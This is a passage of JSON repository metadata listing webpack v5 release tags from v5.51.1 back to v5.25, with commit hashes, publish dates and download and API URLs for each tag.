e7e3da3042b7142fe3deced0bcaac3e704","kind":"tag","published_at":"2021-08-19T14:16:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.1/manifests"},{"name":"v5.51.0","sha":"bd7cb37f1c0d872cfff9fc27c7db52a25e1ba6a3","kind":"tag","published_at":"2021-08-19T09:04:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.0/manifests"},{"name":"v5.50.0","sha":"400a0f94ab45ca20b10f219c8311e87d3d3f108c","kind":"tag","published_at":"2021-08-10T18:31:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.50.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.50.0/manifests"},{"name":"v5.49.0","sha":"d3868384c37f9d674d1db17a0198393bd213c763","kind":"tag","published_at":"2021-08-06T11:07:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.49.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.49.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.49.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.49.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.49.0/manifests"},{"name":"v5.48.0","sha":"67f3aef3c11e2a8d9e7dc1e0300350588ebd7aec","kind":"tag","published_at":"2021-08-02T12:36:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.48.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.48.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.48.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.48.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.48.0/manifests"},{"name":"v5.47.1","sha":"3f353b6ae29ae6d96e0ab86e7233b4c785f99c60","kind":"tag","published_at":"2021-07-29T14:19:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.47.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.47.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.47.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.1/manifests"},{"name":"v5.47.0","sha":"efeb1287e52870036cc01b22476852205e99c31a","kind":"tag","published_at":"2021-07-27T14:27:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.47.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.47.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.47.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.0/manifests"},{"name":"v5.46.0","sha":"a32b0fd041260f3303b9329c9a65cc4afe102390","kind":"tag","published_at":"2021-07-22T10:14:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.46.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.46.0/manifests"},{"name":"v5.45.1","sha":"7102df3bb52a33529ff5db4fdf34484d2a359a49","kind":"tag","published_at":"2021-07-16T20:09:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.45.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.1/manifests"},{"name":"v5.45.0","sha":"db52c58a4fb037ece22be6365f56c11bc78fb426","kind":"tag","published_at":"2021-07-16T15:50:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.45.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.0/manifests"},{"name":"v5.44.0","sha":"f20158d4492e73d07a36cd1614dfbd1dc1ea143d","kind":"tag","published_at":"2021-07-08T19:37:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.44.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.44.0/manifests"},{"name":"v5.43.0","sha":"b53a06437a3e8b2756c550c1be6ccb33fdba03d7","kind":"tag","published_at":"2021-07-06T19:07:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.43.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.43.0/manifests"},{"name":"v5.42.1","sha":"4156b20644d309c0e8acaa1e22ca3a4fe546c0b6","kind":"tag","published_at":"2021-07-05T14:05:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.42.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.1/manifests"},{"name":"v5.42.0","sha":"4fb45402eec7efe1c70e641cab7b24331948ea8d","kind":"tag","published_at":"2021-07-02T07:04:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.42.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.0/manifests"},{"name":"v5.41.1","sha":"9ed05afbeaf87442d86863a20a6c30b0ab437fb5","kind":"tag","published_at":"2021-06-29T14:30:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.41.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.1/manifests"},{"name":"v5.41.0","sha":"fd5dc9997671b4c4b32d15f722e06079cd5da2db","kind":"tag","published_at":"2021-06-28T16:23:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.41.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.0/manifests"},{"name":"v5.40.0","sha":"5d297327bc1f208de16c29f5c9b31d2b8a06bce4","kind":"tag","published_at":"2021-06-21T16:25:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.40.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.40.0/manifests"},{"name":"v5.39.1","sha":"e5ccd070f6c18794173d3f2e60445de5bc2f52a2","kind":"tag","published_at":"2021-06-17T10:21:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.39.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.1/manifests"},{"name":"v5.39.0","sha":"e9f90450d5d8b4e796e5e0e9674869220ab73bcb","kind":"tag","published_at":"2021-06-14T21:31:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.39.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.0/manifests"},{"name":"v5.38.1","sha":"487665cb69f7b1f1aac44097124ef8f33cfe247b","kind":"tag","published_at":"2021-05-27T21:12:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.38.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.1/manifests"},{"name":"v5.38.0","sha":"daa0f1ed1cebc28c8cc9034f95f3b56e9253ec5e","kind":"tag","published_at":"2021-05-27T12:41:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.38.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.0/manifests"},{"name":"v5.37.1","sha":"2a5ed4a2dcbe06e852f84a8e7f63145af87cb139","kind":"tag","published_at":"2021-05-19T06:50:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.37.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.1/manifests"},{"name":"v5.37.0","sha":"a5821c74568d59a330043900328a018c5d3a4af7","kind":"tag","published_at":"2021-05-10T16:21:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.37.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.0/manifests"},{"name":"v5.36.2","sha":"0e2e972a2d181c530bb7185278fe5cfc20724c22","kind":"tag","published_at":"2021-04-30T11:48:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.2/manifests"},{"name":"v5.36.1","sha":"e9de77aae42bd8f7d799a21dd16c98206cd170f6","kind":"tag","published_at":"2021-04-28T18:57:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.1/manifests"},{"name":"v5.36.0","sha":"c0a3394ae059ba30c90b7e84c3805dcfd918577d","kind":"tag","published_at":"2021-04-27T09:44:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.0/manifests"},{"name":"v5.35.1","sha":"ed175cd22f89eb9fecd0a70572a3fd0be028e77c","kind":"tag","published_at":"2021-04-23T18:36:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.35.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.1/manifests"},{"name":"v5.35.0","sha":"e05935f8969d873a20762767d348256e5ad8fb46","kind":"tag","published_at":"2021-04-21T06:37:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.35.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.0/manifests"},{"name":"v5.34.0","sha":"a52263b4537dc5bd954677fc884966b0c11114d4","kind":"tag","published_at":"2021-04-19T14:42:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.34.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.34.0/manifests"},{"name":"v5.33.2","sha":"93ce24d2dc40ee972a2ea5138f3c181563c913fd","kind":"tag","published_at":"2021-04-14T18:31:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.2/manifests"},{"name":"v5.33.1","sha":"7a7d3be25a3db94cb47923d122513726966025cf","kind":"tag","published_at":"2021-04-14T18:08:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.1/manifests"},{"name":"v5.33.0","sha":"7ee3bab88a5f38d4a6356baf93a8c9dfb901b9dc","kind":"tag","published_at":"2021-04-14T17:28:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.0/manifests"},{"name":"v5.32.0","sha":"932950550c85dce4efcaccd7116b4879bfd5f962","kind":"tag","published_at":"2021-04-12T18:54:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.32.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.32.0/manifests"},{"name":"v5.31.2","sha":"cde1b73e12eb8a77eb9ba42e7920c9ec5d29c2c9","kind":"tag","published_at":"2021-04-09T17:52:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.2/manifests"},{"name":"v5.31.1","sha":"34502650252c1f5e2b6e19f3d5afd1fac96f3ec4","kind":"tag","published_at":"2021-04-09T17:07:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.1/manifests"},{"name":"v5.31.0","sha":"b3e26cb5a81087c1b4eadb2e648eb01928c9b3be","kind":"tag","published_at":"2021-04-07T16:39:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.0/manifests"},{"name":"v5.30.0","sha":"f3dce69e9df5f778fb4850662b0f16f9fd9951d2","kind":"tag","published_at":"2021-04-01T18:45:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.30.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.30.0/manifests"},{"name":"v5.29.0","sha":"0522deb7618636b37acae64f5e3b581c7bbb8fca","kind":"tag","published_at":"2021-04-01T15:39:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.29.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.29.0/manifests"},{"name":"v5.28.0","sha":"15110ea6de0b53c93d697716d17037c41a3c0cd2","kind":"tag","published_at":"2021-03-24T12:35:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.28.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.28.0/manifests"},{"name":"v5.27.2","sha":"1c044bc75be02fcfe78eb6a291f2d107f8ac58eb","kind":"tag","published_at":"2021-03-22T14:40:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.2/manifests"},{"name":"v5.27.1","sha":"69d4e174b96f197ef5d9d8396edaa25178f22725","kind":"tag","published_at":"2021-03-20T19:39:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.1/manifests"},{"name":"v5.27.0","sha":"807e69d9647e8605daa815b6b24df8baebaa59b9","kind":"tag","published_at":"2021-03-19T16:46:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.0/manifests"},{"name":"v5.26.3","sha":"4ea8a435ace96cc6fe5c9b741bc14b68d75624a4","kind":"tag","published_at":"2021-03-17T13:38:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.3/manifests"},{"name":"v5.26.2","sha":"c67a73abbc3d3b333b31480bd7ac7a50e8b49e3e","kind":"tag","published_at":"2021-03-16T19:55:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.2/manifests"},{"name":"v5.26.1","sha":"ee09a9609bdebc25e52e785cef56f9698805599d","kind":"tag","published_at":"2021-03-16T14:13:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.1/manifests"},{"name":"v5.26.0","sha":"1def19ea8ab9921d1adaed30ba8f928badb133b5","kind":"tag","published_at":"2021-03-15T16:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.0/manifests"},{"name":"v5.25.1","sha":"58dfda2796edc57c9d18526053d6bcde6f06b8b7","kind":"tag","published_at":"2021-03-14T19:33:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.25.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.1/manifests"},{"name":"v5.25.0","sha":"be352e86b1c88893a62ffc2ada1c9294a016f5db","kind":"tag","published_at":"2021-03-12T07:49:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.25.0","html_url":"https://github.com/we